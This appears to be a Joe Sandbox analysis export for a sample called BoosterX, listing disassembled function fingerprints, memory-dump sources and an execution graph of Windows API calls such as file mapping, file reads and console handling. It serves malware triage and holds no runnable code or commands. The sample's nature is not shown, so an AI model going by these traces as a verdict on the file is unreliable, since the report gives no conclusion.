                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide_snwprintf
                                                    • String ID: $%s$@%s
                                                    • API String ID: 2650857296-834177443
                                                    • Opcode ID: 92f7a5e5db808ff0627fb4716d8c563998de2da1c6043d31c744409d5dfbc019
                                                    • Instruction ID: e692a9d0fe0dc09ad84ff703d3f918a39908d09ed38bec33bfcdeea4348ca855
                                                    • Opcode Fuzzy Hash: 92f7a5e5db808ff0627fb4716d8c563998de2da1c6043d31c744409d5dfbc019
                                                    • Instruction Fuzzy Hash: 2C31CE72B19B87A6EA108F6AE5406E967A4FB45B85F401033EE8DC7B95EF3CE505C700
                                                    Function 00007FF6C038EA84 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: FileHandleType
                                                    • String ID: @
                                                    • API String ID: 3000768030-2766056989
                                                    • Opcode ID: 8946ec43ce519745a17379b38ab7ff34034f07d291e36c027c9943bde98f32e6
                                                    • Instruction ID: 90cec0a94c2596bc3725d386cb133a4f7a1035f5d3c79e86a60893140988abcf
                                                    • Opcode Fuzzy Hash: 8946ec43ce519745a17379b38ab7ff34034f07d291e36c027c9943bde98f32e6
                                                    • Instruction Fuzzy Hash: 07217C22A0CA9391EB658F2894901392651EB85B75F281377DABFDB7D4CF3DE881C240
                                                    Function 00007FF6C0383FF8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6C0381CBE), ref: 00007FF6C038403C
                                                    • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6C0381CBE), ref: 00007FF6C0384082
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFileHeaderRaise
                                                    • String ID: csm
                                                    • API String ID: 2573137834-1018135373
                                                    • Opcode ID: 1d5db736ccfdc40490821f2c69de7fb41a1095ad17331bc3641baf3fc80bbebe
                                                    • Instruction ID: e2209c5055e370e9c93d3f72473524d34ee8e84a86b7c87e6dc4d90de2f78b2d
                                                    • Opcode Fuzzy Hash: 1d5db736ccfdc40490821f2c69de7fb41a1095ad17331bc3641baf3fc80bbebe
                                                    • Instruction Fuzzy Hash: 20114C72608B8292EB208F15E44026AB7A1FB88B95F184272DFCD87B68DF3CD551CB00
                                                    Function 00007FF6C036E9D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16synchronizationCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF6C036E8DB,?,?,?,00007FF6C03645FA,?,?,?), ref: 00007FF6C036E9DF
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF6C036E8DB,?,?,?,00007FF6C03645FA,?,?,?), ref: 00007FF6C036E9EA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastObjectSingleWait
                                                    • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                    • API String ID: 1211598281-2248577382
                                                    • Opcode ID: 54b8b47555da90577a26e8fb1f909d889ddb1753417e6592717e91a991b71306
                                                    • Instruction ID: 58f0fdb94270d8d1d9f3b23afbce4a59710a6db7f0a91d27c570b15ca623dfad
                                                    • Opcode Fuzzy Hash: 54b8b47555da90577a26e8fb1f909d889ddb1753417e6592717e91a991b71306
                                                    • Instruction Fuzzy Hash: 14E09A65E19803B2F600AF25DC465A83211BFA53B6F944331D4BEC17F69F2CA9498705
                                                    Function 00007FF6C036A3FC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: FindHandleModuleResource
                                                    • String ID: RTL
                                                    • API String ID: 3537982541-834975271
                                                    • Opcode ID: e3168a20bccc75ec722704d5b9360ecacf73fabbe3432b4ac0f8e016f3fe19b7
                                                    • Instruction ID: a69cc3b0449034d051f7dba79e62c6b15229b37300bd3b5ed0f5be5523658f18
                                                    • Opcode Fuzzy Hash: e3168a20bccc75ec722704d5b9360ecacf73fabbe3432b4ac0f8e016f3fe19b7
                                                    • Instruction Fuzzy Hash: AED05E91F0960392FF194FB6A84933512506F58B43F485039CC8EC6390EF6CE095C754

                                                    Execution Graph

                                                    Execution Coverage:13%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:2000
                                                    Total number of Limit Nodes:27
                                                    execution_graph 25483 7ff720b62cec 25508 7ff720b6277c 25483->25508 25486 7ff720b62e38 25606 7ff720b630f0 7 API calls 2 library calls 25486->25606 25487 7ff720b62d08 __scrt_acquire_startup_lock 25489 7ff720b62e42 25487->25489 25491 7ff720b62d26 25487->25491 25607 7ff720b630f0 7 API calls 2 library calls 25489->25607 25492 7ff720b62d4b 25491->25492 25498 7ff720b62d68 __scrt_release_startup_lock 25491->25498 25516 7ff720b6cd10 25491->25516 25494 7ff720b62e4d abort 25495 7ff720b62dd1 25520 7ff720b6323c 25495->25520 25497 7ff720b62dd6 25523 7ff720b6cca0 25497->25523 25498->25495 25603 7ff720b6bfd0 35 API calls __GSHandlerCheck_EH 25498->25603 25608 7ff720b62f30 25508->25608 25511 7ff720b627ab 25610 7ff720b6cbd0 25511->25610 25512 7ff720b627a7 25512->25486 25512->25487 25517 7ff720b6cd6b 25516->25517 25518 7ff720b6cd4c 25516->25518 25517->25498 25518->25517 25627 7ff720b31120 25518->25627 25670 7ff720b63c70 25520->25670 25522 7ff720b63253 GetStartupInfoW 25522->25497 25672 7ff720b706b0 25523->25672 25525 7ff720b6ccaf 25526 7ff720b62dde 25525->25526 25676 7ff720b70a40 35 API calls _snwprintf 25525->25676 25528 7ff720b606d4 25526->25528 25678 7ff720b4df4c 25528->25678 25532 7ff720b6071a 25765 7ff720b593ec 25532->25765 25534 7ff720b60724 memcpy_s 25770 7ff720b59994 25534->25770 25536 7ff720b60d5c 25539 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 25536->25539 25537 7ff720b608ee GetCommandLineW 25541 7ff720b60ac2 25537->25541 25542 7ff720b60900 25537->25542 25538 7ff720b60799 25538->25536 25538->25537 25540 7ff720b60d62 25539->25540 25544 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 25540->25544 25808 7ff720b46414 25541->25808 25780 7ff720b3129c 25542->25780 25554 7ff720b60d68 25544->25554 25545 7ff720b60ad1 25547 7ff720b31fa0 31 API calls 25545->25547 25551 7ff720b60ae8 memcpy_s 25545->25551 25547->25551 25548 7ff720b31fa0 31 API calls 25552 7ff720b60b13 SetEnvironmentVariableW GetLocalTime 25548->25552 25549 7ff720b60925 25790 7ff720b5ca50 25549->25790 25551->25548 25820 7ff720b43de8 25552->25820 25855 7ff720b61880 25554->25855 25556 7ff720b6092f 25556->25540 25558 7ff720b60a5b 25556->25558 25559 7ff720b60979 OpenFileMappingW 25556->25559 25566 7ff720b3129c 33 API calls 25558->25566 25561 7ff720b60999 MapViewOfFile 25559->25561 25562 7ff720b60a50 CloseHandle 25559->25562 25561->25562 25564 7ff720b609bf UnmapViewOfFile MapViewOfFile 25561->25564 25562->25541 25564->25562 25567 7ff720b609f1 25564->25567 25569 7ff720b60a80 25566->25569 25881 7ff720b5a110 33 API calls 2 library calls 25567->25881 25568 7ff720b60bf5 25848 7ff720b56734 25568->25848 25899 7ff720b5fc8c 35 API calls 2 library calls 25569->25899 25573 7ff720b60a01 25882 7ff720b5fc8c 35 API calls 2 library calls 25573->25882 25575 7ff720b56734 33 API calls 25578 7ff720b60c07 DialogBoxParamW 25575->25578 25576 7ff720b60a8a 25576->25541 25582 7ff720b60d57 25576->25582 25580 7ff720b60c53 25578->25580 25579 7ff720b60a10 25883 7ff720b4b970 25579->25883 25587 7ff720b60c6c 25580->25587 25588 7ff720b60c66 Sleep 25580->25588 25584 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 25582->25584 25584->25536 25586 7ff720b60a38 25589 7ff720b60a47 UnmapViewOfFile 25586->25589 25590 7ff720b60c7a 25587->25590 25900 7ff720b59ecc 49 API calls 2 library calls 25587->25900 25588->25587 25589->25562 25592 7ff720b60c86 DeleteObject 25590->25592 25593 7ff720b60ca5 25592->25593 25594 7ff720b60c9f DeleteObject 25592->25594 25595 7ff720b60cdb 25593->25595 25596 7ff720b60ced 25593->25596 25594->25593 25901 7ff720b5fda4 PeekMessageW GetMessageW TranslateMessage DispatchMessageW WaitForSingleObject 25595->25901 25851 7ff720b59464 25596->25851 25598 7ff720b60ce0 CloseHandle 25598->25596 25603->25495 25606->25489 25607->25494 25609 7ff720b6279e __scrt_dllmain_crt_thread_attach 25608->25609 25609->25511 25609->25512 25611 7ff720b70ccc 25610->25611 25612 7ff720b627b0 25611->25612 25615 7ff720b6eb80 25611->25615 25612->25512 25614 7ff720b65120 7 API calls 2 library calls 25612->25614 25614->25512 25626 7ff720b6f318 EnterCriticalSection 25615->25626 25632 7ff720b391c8 25627->25632 25631 7ff720b62981 25631->25518 25640 7ff720b45664 25632->25640 25634 7ff720b391df 25643 7ff720b4b744 25634->25643 25638 7ff720b31130 25639 7ff720b6293c 34 API calls 25638->25639 25639->25631 25649 7ff720b456a8 25640->25649 25658 7ff720b313a4 25643->25658 25646 7ff720b39a28 25647 7ff720b456a8 2 API calls 25646->25647 25648 7ff720b39a36 25647->25648 25648->25638 25650 7ff720b456be memcpy_s 25649->25650 25653 7ff720b4eb20 25650->25653 25656 7ff720b4ead4 GetCurrentProcess GetProcessAffinityMask 25653->25656 25657 7ff720b4569e 25656->25657 25657->25634 25659 7ff720b313ad 25658->25659 25660 7ff720b3142d 25658->25660 25661 7ff720b3143d 25659->25661 25662 7ff720b313ce 25659->25662 25660->25646 25669 7ff720b32018 33 API calls std::_Xinvalid_argument 25661->25669 25665 7ff720b62150 33 API calls 25662->25665 25666 7ff720b313db memcpy_s 25662->25666 25665->25666 25668 7ff720b3197c 31 API calls _invalid_parameter_noinfo_noreturn 25666->25668 25668->25660 25671 7ff720b63c50 25670->25671 25671->25522 25671->25671 25673 7ff720b706bd 25672->25673 25674 7ff720b706c9 25672->25674 25677 7ff720b704f0 48 API calls 5 library calls 25673->25677 25674->25525 25676->25525 25677->25674 25902 7ff720b623d0 25678->25902 25681 7ff720b4dff7 25685 7ff720b4e47f 25681->25685 25935 7ff720b6b708 39 API calls 2 library calls 25681->25935 25682 7ff720b4dfa2 GetProcAddress 25683 7ff720b4dfb7 25682->25683 25684 7ff720b4dfcf GetProcAddress 25682->25684 25683->25684 25684->25681 25687 7ff720b4dfe4 25684->25687 25686 7ff720b46414 34 API calls 25685->25686 25689 7ff720b4e488 25686->25689 25687->25681 25904 7ff720b47db4 25689->25904 25690 7ff720b4e32c 25690->25685 25692 7ff720b4e336 25690->25692 25693 7ff720b46414 34 API calls 25692->25693 25694 7ff720b4e33f CreateFileW 25693->25694 25695 7ff720b4e46c CloseHandle 25694->25695 25696 7ff720b4e37f SetFilePointer 25694->25696 25699 7ff720b31fa0 31 API calls 25695->25699 25696->25695 25698 7ff720b4e398 ReadFile 25696->25698 25698->25695 25700 7ff720b4e3c0 25698->25700 25699->25685 25701 7ff720b4e77c 25700->25701 25702 7ff720b4e3d4 25700->25702 25944 7ff720b625a4 8 API calls 25701->25944 25707 7ff720b3129c 33 API calls 25702->25707 25704 7ff720b3129c 33 API calls 25710 7ff720b4e496 25704->25710 25705 7ff720b4e781 25706 7ff720b4e4ba CompareStringW 25706->25710 25709 7ff720b4e40b 25707->25709 25718 7ff720b4e457 25709->25718 25936 7ff720b4d05c 25709->25936 25710->25704 25710->25706 25711 7ff720b31fa0 31 API calls 25710->25711 25742 7ff720b4e548 25710->25742 25912 7ff720b45164 25710->25912 25917 7ff720b48050 25710->25917 25921 7ff720b4327c 25710->25921 25711->25710 25713 7ff720b4e73e 25716 7ff720b31fa0 31 API calls 25713->25716 25714 7ff720b4e5c4 25940 7ff720b47e70 47 API calls 25714->25940 25720 7ff720b4e747 25716->25720 25721 7ff720b31fa0 31 API calls 25718->25721 25719 7ff720b4e5cd 25722 7ff720b45164 9 API calls 25719->25722 25724 7ff720b31fa0 31 API calls 25720->25724 25725 7ff720b4e461 25721->25725 25727 7ff720b4e5d2 25722->25727 25723 7ff720b3129c 33 API calls 25723->25742 25728 7ff720b4e751 25724->25728 25726 7ff720b31fa0 31 API calls 25725->25726 25726->25695 25729 7ff720b4e682 25727->25729 25736 7ff720b4e5dd 25727->25736 25731 7ff720b622a0 _handle_error 8 API calls 25728->25731 25732 7ff720b4da14 48 API calls 25729->25732 25730 7ff720b48050 47 API calls 25730->25742 25733 7ff720b4e760 25731->25733 25734 7ff720b4e6c7 AllocConsole 25732->25734 25755 7ff720b4629c GetCurrentDirectoryW 25733->25755 25737 7ff720b4e677 25734->25737 25738 7ff720b4e6d1 GetCurrentProcessId AttachConsole 25734->25738 25735 7ff720b31fa0 31 API calls 25735->25742 25741 7ff720b4aaa0 48 API calls 25736->25741 25943 7ff720b319e0 31 API calls _invalid_parameter_noinfo_noreturn 25737->25943 25739 7ff720b4e6e8 25738->25739 25748 7ff720b4e6f4 GetStdHandle WriteConsoleW Sleep FreeConsole 25739->25748 25740 7ff720b4327c 51 API calls 25740->25742 25745 7ff720b4e621 25741->25745 25742->25723 25742->25730 25742->25735 25742->25740 25746 7ff720b4e5b6 25742->25746 25744 7ff720b4e735 ExitProcess 25747 7ff720b4da14 48 API calls 25745->25747 25746->25713 25746->25714 25749 7ff720b4e63f 25747->25749 25748->25737 25750 7ff720b4aaa0 48 API calls 25749->25750 25751 7ff720b4e64a 25750->25751 25941 7ff720b4dba8 33 API calls 25751->25941 25753 7ff720b4e656 25942 7ff720b319e0 31 API calls _invalid_parameter_noinfo_noreturn 25753->25942 25756 7ff720b462c0 25755->25756 25761 7ff720b4634d 25755->25761 25757 7ff720b313a4 33 API calls 25756->25757 25758 7ff720b462db GetCurrentDirectoryW 25757->25758 25759 7ff720b46301 25758->25759 26045 7ff720b320b0 25759->26045 25761->25532 25762 7ff720b4630f 25762->25761 25763 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 25762->25763 25764 7ff720b46369 25763->25764 25766 7ff720b4dd04 25765->25766 25767 7ff720b59401 OleInitialize 25766->25767 25768 7ff720b59427 25767->25768 25769 7ff720b5944d SHGetMalloc 25768->25769 25769->25534 25771 7ff720b599c9 25770->25771 25774 7ff720b599ce memcpy_s 25770->25774 25772 7ff720b31fa0 31 API calls 25771->25772 25772->25774 25773 7ff720b31fa0 31 API calls 25779 7ff720b599fd memcpy_s 25773->25779 25774->25773 25774->25779 25775 7ff720b31fa0 31 API calls 25776 7ff720b59a2c memcpy_s 25775->25776 25777 7ff720b59a5b memcpy_s 25776->25777 25778 7ff720b31fa0 31 API calls 25776->25778 25777->25538 25778->25777 25779->25775 25779->25776 25781 7ff720b312d0 25780->25781 25788 7ff720b3139b 25780->25788 25784 7ff720b312de memcpy_s 25781->25784 25785 7ff720b31338 25781->25785 25786 7ff720b31396 25781->25786 25784->25549 25785->25784 25789 7ff720b62150 33 API calls 25785->25789 26050 7ff720b31f80 33 API calls 3 library calls 25786->26050 26051 7ff720b32004 33 API calls std::_Xinvalid_argument 25788->26051 25789->25784 25791 7ff720b4d05c 33 API calls 25790->25791 25806 7ff720b5ca9f memcpy_s 25791->25806 25792 7ff720b5cd0b 25793 7ff720b5cd3e 25792->25793 25796 7ff720b5cd64 25792->25796 25794 7ff720b622a0 _handle_error 8 API calls 25793->25794 25797 7ff720b5cd4f 25794->25797 25795 7ff720b4d05c 33 API calls 25795->25806 25798 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 25796->25798 25797->25556 25799 7ff720b5cd69 25798->25799 26052 7ff720b3704c 47 API calls memcpy_s 25799->26052 25800 7ff720b5cd6f 26053 7ff720b3704c 47 API calls memcpy_s 25800->26053 25803 7ff720b5cd75 25804 7ff720b4babc 102 API calls 25804->25806 25805 7ff720b3129c 33 API calls 25805->25806 25806->25792 25806->25795 25806->25796 25806->25799 25806->25800 25806->25804 25806->25805 25807 7ff720b31fa0 31 API calls 25806->25807 25807->25806 25809 7ff720b313a4 33 API calls 25808->25809 25810 7ff720b46449 25809->25810 25811 7ff720b4644c GetModuleFileNameW 25810->25811 25814 7ff720b4649c 25810->25814 25812 7ff720b46467 25811->25812 25813 7ff720b4649e 25811->25813 25812->25810 25813->25814 25815 7ff720b3129c 33 API calls 25814->25815 25817 7ff720b464c6 25815->25817 25816 7ff720b464fe 25816->25545 25817->25816 25818 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 25817->25818 25819 7ff720b46520 25818->25819 25821 7ff720b43e0d _snwprintf 25820->25821 25822 7ff720b69e70 swprintf 46 API calls 25821->25822 25823 7ff720b43e29 SetEnvironmentVariableW GetModuleHandleW LoadIconW 25822->25823 25824 7ff720b5af94 LoadBitmapW 25823->25824 25825 7ff720b5afbe 25824->25825 25826 7ff720b5afc6 25824->25826 26054 7ff720b585a4 FindResourceExW 25825->26054 25828 7ff720b5afce GetObjectW 25826->25828 25829 7ff720b5afe3 25826->25829 25828->25829 26069 7ff720b5841c 25829->26069 25832 7ff720b5b04e 25843 7ff720b4986c 25832->25843 25833 7ff720b5b01e 26074 7ff720b58484 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25833->26074 25834 7ff720b585a4 11 API calls 25836 7ff720b5b00a 25834->25836 25836->25833 25838 7ff720b5b012 DeleteObject 25836->25838 25837 7ff720b5b027 26075 7ff720b5844c 25837->26075 25838->25833 25842 7ff720b5b03f DeleteObject 25842->25832 26082 7ff720b4989c 25843->26082 25845 7ff720b4987a 26149 7ff720b4a3fc GetModuleHandleW FindResourceW 25845->26149 25847 7ff720b49882 25847->25568 25849 7ff720b62150 33 API calls 25848->25849 25850 7ff720b5677a 25849->25850 25850->25575 25852 7ff720b59481 25851->25852 25853 7ff720b5948a OleUninitialize 25852->25853 25854 7ff720b9e330 25853->25854 26238 7ff720b614d8 25855->26238 25858 7ff720b6190b 25860 7ff720b617e8 DloadReleaseSectionWriteAccess 6 API calls 25858->25860 25859 7ff720b61934 25862 7ff720b619bd LoadLibraryExA 25859->25862 25863 7ff720b61a3d 25859->25863 25864 7ff720b61b05 25859->25864 25865 7ff720b61a29 25859->25865 25861 7ff720b61918 RaiseException 25860->25861 25874 7ff720b61b35 25861->25874 25862->25865 25866 7ff720b619d4 GetLastError 25862->25866 25863->25864 25867 7ff720b61a9b GetProcAddress 25863->25867 26246 7ff720b617e8 25864->26246 25865->25863 25870 7ff720b61a34 FreeLibrary 25865->25870 25868 7ff720b619fe 25866->25868 25869 7ff720b619e9 25866->25869 25867->25864 25873 7ff720b61ab0 GetLastError 25867->25873 25872 7ff720b617e8 DloadReleaseSectionWriteAccess 6 API calls 25868->25872 25869->25865 25869->25868 25870->25863 25875 7ff720b61a0b RaiseException 25872->25875 25876 7ff720b61ac5 25873->25876 25874->25554 25875->25874 25876->25864 25877 7ff720b617e8 DloadReleaseSectionWriteAccess 6 API calls 25876->25877 25878 7ff720b61ae7 RaiseException 25877->25878 25879 7ff720b614d8 _com_raise_error 6 API calls 25878->25879 25880 7ff720b61b01 25879->25880 25880->25864 25881->25573 25882->25579 25884 7ff720b4b9a4 25883->25884 25886 7ff720b4b9f8 25883->25886 25884->25886 25887 7ff720b4b9c4 GetProcAddressForCaller GetProcAddress 25884->25887 25885 7ff720b4ba86 GetCurrentProcessId 25888 7ff720b4ba67 25885->25888 25886->25885 25889 7ff720b4ba2a 25886->25889 25887->25886 25895 7ff720b4babc 25888->25895 25889->25888 26267 7ff720b3b67c 99 API calls _handle_error 25889->26267 25891 7ff720b4ba52 26268 7ff720b3ba60 99 API calls 3 library calls 25891->26268 25893 7ff720b4ba5a 26269 7ff720b3b674 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 25893->26269 25897 7ff720b4badb 25895->25897 25896 7ff720b4bb17 25896->25586 25897->25896 26270 7ff720b4b928 25897->26270 25899->25576 25900->25590 25901->25598 25903 7ff720b4df70 GetModuleHandleW 25902->25903 25903->25681 25903->25682 25905 7ff720b47dcc 25904->25905 25906 7ff720b47e15 25905->25906 25907 7ff720b47de3 25905->25907 25945 7ff720b3704c 47 API calls memcpy_s 25906->25945 25909 7ff720b3129c 33 API calls 25907->25909 25911 7ff720b47e07 25909->25911 25910 7ff720b47e1a 25911->25710 25913 7ff720b45188 GetVersionExW 25912->25913 25914 7ff720b451bb 25912->25914 25913->25914 25915 7ff720b622a0 _handle_error 8 API calls 25914->25915 25916 7ff720b451e8 25915->25916 25916->25710 25918 7ff720b48065 25917->25918 25946 7ff720b48148 25918->25946 25920 7ff720b4808a 25920->25710 25922 7ff720b432a7 GetFileAttributesW 25921->25922 25923 7ff720b432a4 25921->25923 25924 7ff720b43335 25922->25924 25925 7ff720b432b8 25922->25925 25923->25922 25926 7ff720b622a0 _handle_error 8 API calls 25924->25926 25955 7ff720b469cc 25925->25955 25928 7ff720b43349 25926->25928 25928->25710 25930 7ff720b432fc 25930->25924 25932 7ff720b43359 25930->25932 25931 7ff720b432e3 GetFileAttributesW 25931->25930 25933 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 25932->25933 25934 7ff720b4335e 25933->25934 25935->25690 25938 7ff720b4d08e 25936->25938 25937 7ff720b4d0c2 25937->25709 25938->25937 25939 7ff720b31744 33 API calls 25938->25939 25939->25938 25940->25719 25941->25753 25942->25737 25943->25744 25944->25705 25945->25910 25947 7ff720b482e6 25946->25947 25950 7ff720b4817a 25946->25950 25954 7ff720b3704c 47 API calls memcpy_s 25947->25954 25949 7ff720b482eb 25952 7ff720b48194 memcpy_s 25950->25952 25953 7ff720b45864 33 API calls 2 library calls 25950->25953 25952->25920 25953->25952 25954->25949 25956 7ff720b46a0b 25955->25956 25957 7ff720b46a04 25955->25957 25960 7ff720b3129c 33 API calls 25956->25960 25958 7ff720b622a0 _handle_error 8 API calls 25957->25958 25959 7ff720b432df 25958->25959 25959->25930 25959->25931 25961 7ff720b46a36 25960->25961 25962 7ff720b46c87 25961->25962 25963 7ff720b46a56 25961->25963 25964 7ff720b4629c 35 API calls 25962->25964 25965 7ff720b46b09 25963->25965 25966 7ff720b46a70 25963->25966 25968 7ff720b46ca6 25964->25968 25993 7ff720b3129c 33 API calls 25965->25993 26027 7ff720b46b04 25965->26027 25992 7ff720b4706b 25966->25992 26028 7ff720b3c0a8 33 API calls 2 library calls 25966->26028 25970 7ff720b46eaf 25968->25970 25972 7ff720b46cdb 25968->25972 25968->26027 25971 7ff720b4708f 25970->25971 26037 7ff720b3c0a8 33 API calls 2 library calls 25970->26037 26043 7ff720b32004 33 API calls std::_Xinvalid_argument 25971->26043 25973 7ff720b4707d 25972->25973 26031 7ff720b3c0a8 33 API calls 2 library calls 25972->26031 26041 7ff720b32004 33 API calls std::_Xinvalid_argument 25973->26041 25974 7ff720b47095 25981 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 25974->25981 25975 7ff720b47071 25980 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 25975->25980 25977 7ff720b46ac3 25990 7ff720b31fa0 31 API calls 25977->25990 25994 7ff720b46ad5 memcpy_s 25977->25994 25988 7ff720b47077 25980->25988 25989 7ff720b4709b 25981->25989 25982 7ff720b47066 25987 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 25982->25987 25983 7ff720b46f16 26038 7ff720b311cc 33 API calls memcpy_s 25983->26038 25985 7ff720b47083 25997 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 25985->25997 25986 7ff720b31fa0 31 API calls 25986->26027 25987->25992 25998 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 25988->25998 26000 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 25989->26000 25990->25994 26040 7ff720b32004 33 API calls std::_Xinvalid_argument 25992->26040 26001 7ff720b46b7e 25993->26001 25994->25986 25995 7ff720b46f29 26039 7ff720b4576c 33 API calls memcpy_s 25995->26039 26003 7ff720b47089 25997->26003 25998->25973 25999 7ff720b31fa0 31 API calls 26010 7ff720b46db5 25999->26010 26005 7ff720b470a1 26000->26005 26029 7ff720b457e0 33 API calls 26001->26029 26042 7ff720b3704c 47 API calls memcpy_s 26003->26042 26004 7ff720b46d36 memcpy_s 26004->25985 26004->25999 26006 7ff720b46b93 26030 7ff720b3e174 33 API calls 2 library calls 26006->26030 26009 7ff720b31fa0 31 API calls 26012 7ff720b46fac 26009->26012 26013 7ff720b46de1 26010->26013 26032 7ff720b31744 33 API calls 4 library calls 26010->26032 26011 7ff720b46f39 memcpy_s 26011->25989 26011->26009 26014 7ff720b31fa0 31 API calls 26012->26014 26013->26003 26019 7ff720b3129c 33 API calls 26013->26019 26017 7ff720b46fb6 26014->26017 26016 7ff720b31fa0 31 API calls 26021 7ff720b46c2d 26016->26021 26018 7ff720b31fa0 31 API calls 26017->26018 26018->26027 26023 7ff720b46e82 26019->26023 26020 7ff720b46ba9 memcpy_s 26020->25988 26020->26016 26022 7ff720b31fa0 31 API calls 26021->26022 26022->26027 26033 7ff720b32034 26023->26033 26025 7ff720b46e9f 26026 7ff720b31fa0 31 API calls 26025->26026 26026->26027 26027->25957 26027->25974 26027->25975 26027->25982 26028->25977 26029->26006 26030->26020 26031->26004 26032->26013 26034 7ff720b32085 26033->26034 26036 7ff720b32059 memcpy_s 26033->26036 26044 7ff720b315b8 33 API calls 3 library calls 26034->26044 26036->26025 26037->25983 